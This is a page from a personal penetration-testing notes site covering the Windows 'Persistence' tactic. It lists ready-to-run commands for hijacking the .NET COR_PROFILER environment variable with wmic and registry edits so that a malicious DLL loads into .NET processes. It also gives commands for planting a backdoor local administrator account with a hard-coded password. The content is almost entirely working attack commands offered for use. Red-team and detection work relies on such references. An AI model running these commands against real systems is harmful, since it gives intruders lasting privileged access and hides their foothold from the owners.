burmat / nathan burchfield
  • security and systems administration
  • security / hacking
    • Domain Enumeration + Exploitation
      • Command and Control
      • Credential Access
      • Defense Evasion
      • Discovery
      • Execution
      • Impact
      • Lateral Movement
      • Persistence
      • Privilege Escalation
    • Tools and Services
      • Adobe Experience Manager (AEM)
      • amass
      • ike-scan
      • jq
      • Shodan
      • smbmap
      • tmux
      • tshark
      • Voice Over IP (VoIP)
    • One-Liners and Dirty Scripts
    • MSFvenom Cheetsheet
    • Web Application Hacking
      • Cross-Site Scripting (XXS)
      • SQL Injection (SQLi)
    • OSCP / PWK - Random Tips and Tricks
  • systems administration
    • Active Directory Administration
    • Exchange Administration
    • System Fixes
    • Helper Commands
    • Log Parsing
    • SQL Server Administration
    • Windows Terminal Themes
Powered by GitBook
On this page
  • COR Profiler Variable Hijack
  • Local Administrator Account Creation
  1. security / hacking
  2. Domain Enumeration + Exploitation

Persistence

The adversary is trying to maintain their foothold. https://attack.mitre.org/tactics/TA0003/

PreviousLateral MovementNextPrivilege Escalation

Last updated 7 months ago

COR Profiler Variable Hijack

Source:

# deleting existing COR_PROFILER variable
wmic ENVIRONMENT where "name='COR_PROFILER'" delete

# creating COR_ENABLE_PROFILING variable and setting it to 1
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="<system>",VariableValue="1"

# creating a new COR_PROFILER variable
wmic ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="<arbitrary CLSID>"

# adding registry keys for malicious DLL
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /V ThreadingModel /T REG_SZ /D Apartment /F
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /VE /T REG_SZ /D "<malicious_DLL>" /F

Local Administrator Account Creation

net user burmat BURMAT123123123 /add
net localgroup administrators burmat /add 
net localgroup administrators
https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework